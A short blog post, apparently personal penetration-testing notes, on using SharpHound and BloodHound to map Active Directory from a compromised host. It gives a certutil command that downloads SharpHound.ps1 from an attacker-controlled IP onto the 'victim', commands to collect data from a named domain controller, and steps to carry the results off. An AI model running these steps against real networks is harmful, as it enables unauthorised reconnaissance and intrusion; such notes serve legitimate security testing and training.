BloodHound analyzes and present Active Directory Data. SharpHound is the data collector which runs on a compromised AD system.
On the target:
- Upload the latest SharpHound.ps1 release to the target.
- Execute it
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp - Download the findings
On the own system:
- Start Bloodhound
# neo4j start
# bloodhound
- Upload the file SharpHound.ps1 (in the Ingestors directory) to the victim
certutil.exe -urlcache -split -f "http://192.168.119.158:8000/SharpHound.ps1" SharpHound.ps1
- Execute it on the victim within PowerShell:
Import-Module .\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -Domain svcorp.com -DomainController 10.11.1.20
- Download the created ZIP file
- Import the files locally and analyse them.
Leave a Reply
You must be logged in to post a comment.